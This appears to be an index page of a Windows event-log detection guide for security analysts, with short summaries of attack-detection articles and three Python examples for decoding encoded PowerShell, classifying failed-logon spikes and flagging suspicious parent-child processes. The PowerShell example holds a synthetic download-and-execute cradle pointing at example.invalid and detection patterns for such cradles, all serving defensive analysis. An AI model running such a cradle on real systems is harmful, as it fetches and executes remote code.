Windows Event Log Detection Guide
Security reference for analysts and threat hunters. Each guide covers what the event means, MITRE ATT&CK mapping, investigation steps, and remediation.
Event ID 4625 — Failed Logon
Event ID 4625 is logged every time a Windows account fails to authenticate. A single failure is normal, but large volume…
Event ID 4794 — DSRM Account Password Change
Event ID 4794 is logged when the Directory Services Restore Mode (DSRM) administrator password on a domain controller is…
Event ID 1102 — Security Audit Log Cleared
Event ID 1102 is logged when the Windows Security event log is cleared. While administrators sometimes clear logs for ma…
Event ID 4698 — Scheduled Task Created
Event ID 4698 is logged when a new scheduled task is created on a Windows system. Scheduled tasks are a common persisten…
Event ID 7045 — New Service Installed
Event ID 7045 is logged when a new Windows service is installed on a system. While legitimate software installs services…
Event ID 4104 — PowerShell Script Block Logging
Event ID 4104 captures the full content of PowerShell scripts as they execute, including de-obfuscated code. When script…
Event ID 4740 — Account Lockout
Event ID 4740 is logged when a Windows user account is locked out after exceeding the failed logon threshold. Account lo…
Event ID 4672 — Special Privileges Assigned to New Logon
Event ID 4672 is logged whenever an account logs on with sensitive or special privileges such as SeDebugPrivilege, SeImp…
Event ID 4720 — User Account Created
Event ID 4720 is logged when a new user account is created in Active Directory or on a local Windows system. While routi…
Event ID 4728 / 4732 — User Added to Privileged Group
Event ID 4728 is logged when a user is added to a global security group (such as Domain Admins). Event ID 4732 covers lo…
PowerShell Abuse — Living Off the Land
PowerShell is one of the most abused tools in modern attacks. Because it is built into every Windows system and trusted …
PowerShell Encoded Command & Obfuscation Detection — AMSI Bypass, Downgrade Attacks
Attackers obfuscate PowerShell to evade signature-based detection — encoding commands in Base64, splitting strings to br…
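The decoding step an analyst runs on a suspicious command line, as an added example (not code from this guide): powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...) followed by Base64 of the script in UTF-16LE, so the snippet below finds that flag, decodes the blob, and then looks for the obfuscation and download-cradle markers the page lists (Base64, string splitting) in both the raw and decoded text. The sample command lines, the marker names and the example.invalid URL are constructed for illustration.

```python
"""Decode PowerShell -EncodedCommand payloads and flag obfuscation markers.
Constructed example: sample command lines below are synthetic, not real telemetry."""
import base64
import re
from typing import Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, so match
# every prefix from -e up to -encodedcommand; "-ex"/"-ep" (ExecutionPolicy) do
# not match because the flag must be followed by whitespace.
_ENC_FLAG = re.compile(
    r"(?<!\w)-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedco|"
    r"encodedcom|encodedcomm|encodedcomma|encodedcomman|encodedcommand)"
    r"\s+[\"']?([A-Za-z0-9+/=]{8,})",
    re.IGNORECASE,
)

# Markers that point at obfuscated or download-and-execute PowerShell
# (illustrative set, not an exhaustive signature list).
_MARKERS = {
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I),
    "nested_base64": re.compile(r"frombase64string", re.I),
    # two or more quoted fragments joined with '+', e.g. 'I'+'E'+'X'
    "string_concat": re.compile(r"(['\"][^'\"]*['\"]\s*\+\s*){2,}"),
    "char_casts": re.compile(r"\[char\]\s*\d+", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}


def encode_ps(script: str) -> str:
    """Produce the Base64(UTF-16LE) form powershell.exe expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script if the command line carries an encoded command."""
    m = _ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Not valid Base64 / not UTF-16LE: treat as "no decodable payload".
        return None


def find_markers(text: str) -> list:
    """Names of obfuscation markers present in the text, sorted for stable output."""
    return sorted(name for name, rx in _MARKERS.items() if rx.search(text))


def analyze(command_line: str) -> dict:
    """Decode (if encoded) and collect markers from the raw and decoded text."""
    decoded = decode_encoded_command(command_line)
    markers = set(find_markers(command_line))
    if decoded is not None:
        markers |= set(find_markers(decoded))
    return {"decoded": decoded, "markers": sorted(markers)}


# Constructed samples, shaped like the CommandLine field of 4688 / Sysmon 1.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_COMMAND_LINES = [
    # benign admin use: no encoding, no markers
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    # encoded download cradle with hidden window
    "powershell.exe -nop -w hidden -enc " + encode_ps(PAYLOAD),
    # string-splitting obfuscation of Invoke-Expression in the clear
    "powershell.exe -c \"&('I'+'E'+'X') ('Get-'+'Process')\"",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(analyze(line))
```

The split-string sample shows why decoding alone is not enough: nothing in it is encoded, yet the `'I'+'E'+'X'` pattern is the same Invoke-Expression call. Event ID 4104 script block logs record the de-obfuscated form, so where those are enabled the markers should be run over the script block text as well as the 4688 command line.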
PowerShell Security — Attack Detection, Logging & Investigation Hub
PowerShell is the most abused execution tool in modern Windows attacks — used for payload delivery, credential dumping, …
Failed Logon Spike — Brute Force and Password Spray
A failed logon spike is a large volume of authentication failures in a short window — the fingerprint of a brute-force o…
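The distinction between the two shapes of a failed logon spike, as an added example (not code from this guide): a brute-force source hammers one or a few accounts, while a password spray touches many accounts once or twice each, so counting both total failures and distinct target accounts per source within a sliding window separates them. The 4625 records below are synthetic, and the thresholds, window size and field names are assumptions to be tuned to the environment.

```python
"""Classify Windows Event ID 4625 bursts as brute force or password spray.
Constructed example: the event stream is synthetic, not real telemetry."""
from collections import deque
from datetime import datetime, timedelta

# 4625 SubStatus values (assumed field name; values are the documented NTSTATUS codes).
SUBSTATUS_BAD_PASSWORD = "0xC000006A"
SUBSTATUS_NO_SUCH_USER = "0xC0000064"


def make_events():
    """Build a synthetic 4625 stream with one brute-force source, one spray source, and noise."""
    t0 = datetime(2024, 1, 15, 9, 0, 0)
    events = []
    # 10.0.0.5: 40 bad passwords against one service account in ~2 minutes
    for i in range(40):
        events.append(dict(time=t0 + timedelta(seconds=3 * i), user="svc_backup",
                           ip="10.0.0.5", substatus=SUBSTATUS_BAD_PASSWORD))
    # 10.0.0.9: one bad password each against 30 different users over ~7.5 minutes
    for i in range(30):
        events.append(dict(time=t0 + timedelta(seconds=15 * i), user=f"user{i:02d}",
                           ip="10.0.0.9", substatus=SUBSTATUS_BAD_PASSWORD))
    # 10.0.0.20: three typos by one user spread over ten minutes (benign)
    for i in range(3):
        events.append(dict(time=t0 + timedelta(minutes=5 * i), user="alice",
                           ip="10.0.0.20", substatus=SUBSTATUS_BAD_PASSWORD))
    return events


def detect(events, window=timedelta(minutes=10), min_failures=20, spray_min_accounts=15):
    """Sliding-window classification per source IP.

    Returns one finding per source: 'password_spray' when the window holds
    failures against at least spray_min_accounts distinct accounts,
    'brute_force' when it holds at least min_failures failures otherwise.
    """
    findings = []
    by_ip = {}
    for e in sorted(events, key=lambda e: e["time"]):
        by_ip.setdefault(e["ip"], []).append(e)
    for ip, evs in by_ip.items():
        recent = deque()  # events from this source inside the current window
        for e in evs:
            recent.append(e)
            while recent[0]["time"] < e["time"] - window:
                recent.popleft()
            accounts = {x["user"] for x in recent}
            if len(accounts) >= spray_min_accounts:
                kind = "password_spray"
            elif len(recent) >= min_failures:
                kind = "brute_force"
            else:
                continue
            unknown = sum(1 for x in recent if x["substatus"] == SUBSTATUS_NO_SUCH_USER)
            findings.append(dict(ip=ip, kind=kind, failures=len(recent),
                                 accounts=len(accounts), unknown_users=unknown,
                                 first=recent[0]["time"], last=e["time"]))
            break  # one finding per source is enough for triage
    return findings


if __name__ == "__main__":
    for f in detect(make_events()):
        print(f)
```

The spray source never trips a per-account lockout threshold, which is exactly why it does not show up as Event ID 4740; the distinct-account count per source is what catches it. The unknown_users count (SubStatus 0xC0000064) is kept in the finding because a high share of non-existent usernames usually means the attacker is working from a guessed or scraped user list.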
Windows Authentication Attacks — Credential, Kerberos & NTLM Detection Hub
Authentication attacks are the most common initial access and lateral movement vector in Windows environments. This hub …
Windows Defender Disabled or Tampered
Attackers routinely disable or tamper with Windows Defender before executing their main payload — disabling real-time pr…
Microsoft Defender Alerts — Investigation & Response Guide
Windows Defender logs every detection, remediation action, and configuration change as Windows events. This hub covers h…
Lateral Movement — Spreading Across the Network
Lateral movement is how attackers spread from their initial foothold to other systems on the network — reaching domain c…
Ransomware Indicators — Pre-Encryption Activity
Ransomware attacks follow a predictable pattern in Windows event logs — disabling defenses, establishing persistence, sp…
Privilege Escalation — Gaining Admin and Domain Access
Privilege escalation is the step between gaining an initial foothold and gaining full control. Attackers add accounts to…
WMI Persistence — Event Subscription Backdoors
Windows Management Instrumentation (WMI) event subscriptions allow code to execute automatically in response to system e…
Credential Dumping
Credential dumping is the extraction of account credentials — password hashes, plaintext passwords, or Kerberos tickets …
LSASS Memory Credential Dumping — Detection Beyond Mimikatz
LSASS (Local Security Authority Subsystem Service) stores credential material for every active session — NTLM hashes, Ke…
DCSync Attack Detection — Mimikatz Replication & AD Credential Dumping
A DCSync attack abuses Active Directory replication rights to impersonate a domain controller and pull password hashes f…
DCShadow Attack Detection — Rogue Domain Controller & AD Replication Abuse
DCShadow registers a rogue Domain Controller from a compromised domain-joined machine, forces malicious changes into Act…
Detect Mimikatz — LSASS Dumping, DCSync & Credential Theft Indicators
Mimikatz is the most widely used credential theft tool in post-exploitation. It can extract plaintext passwords and NTLM…
Detect Pass-the-Hash — NTLM Lateral Movement & Suspicious Network Logons
Pass-the-Hash (PtH) is a lateral movement technique where an attacker uses a stolen NTLM password hash to authenticate a…
Overpass-the-Hash — NTLM Hash to Kerberos TGT Conversion
Overpass-the-Hash (OPtH) — also called Pass-the-Key — converts a stolen NTLM password hash into a legitimate Kerberos Ti…
Living-Off-the-Land Binary Abuse (LOLBins)
Living-off-the-land (LOLBin) attacks abuse legitimate Windows binaries — certutil, bitsadmin, regsvr32, mshta, and other…
Rundll32 Abuse — LOLBin Code Execution, LSASS Dump & DLL Proxy Detection
Rundll32.exe is a signed, trusted Windows binary that executes exported functions from DLL files. Attackers abuse it to …
Kerberos Attacks (Kerberoasting, AS-REP Roasting)
Kerberos attacks exploit the Windows authentication protocol to extract and crack service account credentials offline, o…
Detect Golden Ticket Attacks — Forged Kerberos TGT & krbtgt Hash Abuse
A Golden Ticket is a forged Kerberos Ticket Granting Ticket (TGT) created using the krbtgt account's NTLM hash. Because …
Detect Silver Ticket Attacks — Forged Kerberos Service Tickets
A Silver Ticket is a forged Kerberos service ticket (TGS) created using a service account's NTLM hash. Unlike a Golden T…
Pass-the-Ticket — Stolen Kerberos Ticket Lateral Movement
Pass-the-Ticket (PtT) steals a valid Kerberos ticket from a user's LSASS memory and injects it into a different session,…
AS-REP Roasting — Kerberos Pre-Authentication Disabled Account Attack
AS-REP Roasting exploits accounts with Kerberos pre-authentication disabled. Without pre-authentication, the Domain Cont…
Skeleton Key Attack — In-Memory LSASS Patch for Universal DC Authentication
A Skeleton Key attack patches LSASS on a domain controller in memory, inserting a secondary 'skeleton' password that wor…
Suspicious Process Creation — Abnormal Parent-Child Relationships
Event ID 4688 logs every process creation on Windows when process auditing is enabled. Attackers abuse this by launching…
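A parent-child check of the kind this guide describes, as an added example (not code from this guide): it normalises the 4688 NewProcessName and ParentProcessName paths to a lowercase basename and applies three illustrative rules: Office applications spawning a shell or script host, a core system process with a parent other than the one Windows always gives it, and lsass.exe spawning anything at all. The allowlists, rule names and sample records are constructed for illustration and would need tuning in a real environment.

```python
"""Flag suspicious parent-child pairs in Windows Event ID 4688 records.
Constructed example: rule tables and sample records are illustrative."""
import ntpath

# Parents that should essentially never launch a shell or script host.
OFFICE_AND_VIEWERS = {"winword.exe", "excel.exe", "powerpnt.exe",
                      "outlook.exe", "acrord32.exe"}
SHELLS_AND_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                    "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Children whose parent is fixed by the Windows boot chain (illustrative subset);
# any other parent points at masquerading or a process launched by hand.
EXPECTED_PARENT = {
    "services.exe": {"wininit.exe"},
    "lsass.exe": {"wininit.exe"},
    "svchost.exe": {"services.exe"},
    "csrss.exe": {"smss.exe"},
}


def _name(path: str) -> str:
    """Lowercase basename of a Windows path, independent of the host OS."""
    return ntpath.basename(path).lower()


def check_4688(record: dict) -> list:
    """Return rule names matched by one 4688 record (empty list when benign)."""
    parent = _name(record.get("ParentProcessName", ""))
    child = _name(record.get("NewProcessName", ""))
    hits = []
    if parent in OFFICE_AND_VIEWERS and child in SHELLS_AND_HOSTS:
        hits.append("office_spawned_shell")
    if child in EXPECTED_PARENT and parent not in EXPECTED_PARENT[child]:
        hits.append("unexpected_parent")
    if parent == "lsass.exe":
        hits.append("lsass_spawned_child")
    return hits


def triage(records) -> list:
    """(parent, child, rules) for every record that matched at least one rule."""
    out = []
    for r in records:
        hits = check_4688(r)
        if hits:
            out.append((_name(r["ParentProcessName"]), _name(r["NewProcessName"]), hits))
    return out


# Constructed sample records using the 4688 field names.
SAMPLE_EVENTS = [
    {"ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
    {"ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
    {"ParentProcessName": r"C:\Windows\System32\wininit.exe",
     "NewProcessName": r"C:\Windows\System32\services.exe"},
    {"ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "NewProcessName": r"C:\Windows\System32\svchost.exe"},
    {"ParentProcessName": r"C:\Windows\System32\lsass.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
```

Two caveats a practitioner will hit: the parent name in 4688 (Creator Process Name) is only populated on Windows 10 / Server 2016 and later, and matching on basename alone is deliberately loose, so a copy of svchost.exe dropped outside System32 still matches the name; checking the full path against the expected directory is the natural next rule to add.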
UAC Bypass Detection — Privilege Escalation Without a Prompt
UAC bypass techniques allow attackers to silently elevate a process from a standard or medium-integrity context to high …
PsExec & Remote Execution — Lateral Movement via Admin Shares
PsExec is a Sysinternals tool that executes commands on remote systems over SMB using admin shares (ADMIN$, C$). It is w…
Scheduled Task Abuse — Persistence and Lateral Execution
Windows Scheduled Tasks are a primary persistence mechanism abused by malware, ransomware, and post-exploitation framewo…
Account Persistence — Backdoor Accounts and Unauthorized Group Changes
Attackers who gain domain admin privileges frequently create backdoor accounts or add existing accounts to privileged gr…
Malicious Service Installation — Persistence via Windows Services
Windows services run continuously in the background, start automatically at boot, and often execute under SYSTEM or Loca…
Registry Run Key Persistence — Autostart via HKCU/HKLM Run Keys
Registry Run keys are one of the oldest and most common Windows persistence mechanisms. Entries written to HKCU\Software…
Detecting Cobalt Strike with Sysmon
Cobalt Strike is the most widely abused commercial red-team framework in real-world attacks. It operates via a 'beacon' …
Detecting Mimikatz with Sysmon
Mimikatz is the most widely used credential extraction tool in Windows environments. It reads NTLM hashes, Kerberos tick…
Detecting Ransomware with Sysmon
Ransomware leaves a distinctive Sysmon trail across three event types: Sysmon 11 (File Create) captures the mass file en…
Detecting Lateral Movement with Sysmon
Lateral movement is how attackers expand from one compromised host to others in the environment. Sysmon exposes lateral …